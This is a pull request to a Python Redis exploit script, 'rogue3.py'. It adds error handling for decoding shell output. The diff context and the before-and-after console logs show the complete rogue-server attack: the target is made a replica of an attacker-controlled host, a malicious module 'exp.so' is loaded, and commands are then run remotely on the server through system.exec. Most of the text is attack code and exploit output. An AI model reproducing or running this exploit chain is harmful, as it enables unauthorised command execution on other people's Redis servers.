### PR TITLE
fix attribute error when decode response

### DIFF
--- a/rogue3.py
+++ b/rogue3.py
@@ -110,14 +110,18 @@ def interact(remote):
             if cmd == "exit":
                 return
             r = remote.shell_cmd(cmd)
-            for l in decode_shell_result(r).split("\n"):
-                if l:
-                    print("\033[1;34;40m[>>]\033[0m " + l)
+            try:
+                for l in decode_shell_result(r).split("\n"):
+                    if l:
+                        print("\033[1;34;40m[>>]\033[0m " + l)
+            except AttributeError:
+                pass
+
     except KeyboardInterrupt:
         return
 
 def runserver(rhost, rport, lhost, lport):
-    # expolit
+    # exploit
     remote = Remote(rhost, rport)
     remote.do(f"SLAVEOF {lhost} {lport}")
     remote.do("CONFIG SET dbfilename exp.so")


### PR DESCRIPTION
When remote.shell_cmd(cmd) return list, and decode_shell_result was giving an AttributeError.
I've fixed the error and able to get the results of the command.

Before:

```
$ python3 rogue3.py --rhost 127.0.0.1 --rport 6379 --lhost 192.168.100.8 --lport 21000
TARGET 127.0.0.1:6379
SERVER 192.168.100.8:21000
[<-] ['*3', '$7', 'SLAVEOF', '$14', '192.168.100.8', '$5', '21000']
[->] ['+OK']
[<-] ['*4', '$6', 'CONFIG', '$3', 'SET', '$10', 'dbfilename', '$6', 'exp.so']
[->] ['+OK']
[->] ['*1', '$4', 'PING']
[<-] ['+PONG']
[->] ['*3', '$8', 'REPLCONF', '$14', 'listening-port', '$4', '6379']
[<-] ['+OK']
[->] ['*5', '$8', 'REPLCONF', '$4', 'capa', '$3', 'eof', '$4', 'capa', '$6', 'psync2']
[<-] ['+OK']
[->] ['*3', '$5', 'PSYNC', '$40', 'e9edd1cab0cb5ac994804e0a6361d7e366dbbb47', '$1', '1']
[<-] ['*3', '$6', 'MODULE', '$4', 'LOAD', '$8', './exp.so']
[->] ['+OK']
[<-] ['*3', '$7', 'SLAVEOF', '$2', 'NO', '$3', 'ONE']
[->] ['+OK']
[<<] pwd
[<-] ['*2', '$11', 'system.exec', '$3', 'pwd']
[<<] pwd
[<-] ['*2', '$11', 'system.exec', '$3', 'pwd']
[->] ['$7', '\x08/data']
Traceback (most recent call last):
  File "rogue3.py", line 155, in <module>
    runserver(options.rh, options.rp, options.lh, options.lp)
  File "rogue3.py", line 132, in runserver
    interact(remote)
  File "rogue3.py", line 113, in interact
    for l in decode_shell_result(r).split("\n"):
  File "rogue3.py", line 45, in decode_shell_result
    return "\n".join(s.split("\r\n")[1:-1])
AttributeError: 'list' object has no attribute 'split'
```

After:

```
$ python3 rogue3.py --rhost 127.0.0.1 --rport 6379 --lhost 192.168.100.8 --lport 21000
TARGET 127.0.0.1:6379
SERVER 192.168.100.8:21000
[<-] ['*3', '$7', 'SLAVEOF', '$14', '192.168.100.8', '$5', '21000']
[->] ['+OK Already connected to specified master']
[<-] ['*4', '$6', 'CONFIG', '$3', 'SET', '$10', 'dbfilename', '$6', 'exp.so']
[->] ['+OK']
[->] ['*1', '$4', 'PING']
[<-] ['+PONG']
[->] ['*3', '$8', 'REPLCONF', '$14', 'listening-port', '$4', '6379']
[<-] ['+OK']
[->] ['*5', '$8', 'REPLCONF', '$4', 'capa', '$3', 'eof', '$4', 'capa', '$6', 'psync2']
[<-] ['+OK']
[->] ['*3', '$5', 'PSYNC', '$40', '47877e11beedfb7acc70e41d96e0345f44180bd5', '$1', '1']
[<-] ['*3', '$6', 'MODULE', '$4', 'LOAD', '$8', './exp.so']
[->] ['-ERR Error loading the extension. Please check the server logs.']
[<-] ['*3', '$7', 'SLAVEOF', '$2', 'NO', '$3', 'ONE']
[->] ['+OK']
[<<] pwd
[<-] ['*2', '$11', 'system.exec', '$3', 'pwd']
[->] ['$6', '/data']
[<<] ls 
[<-] ['*2', '$11', 'system.exec', '$2', 'ls']
[->] ['$9', '=\x01exp.so']
```
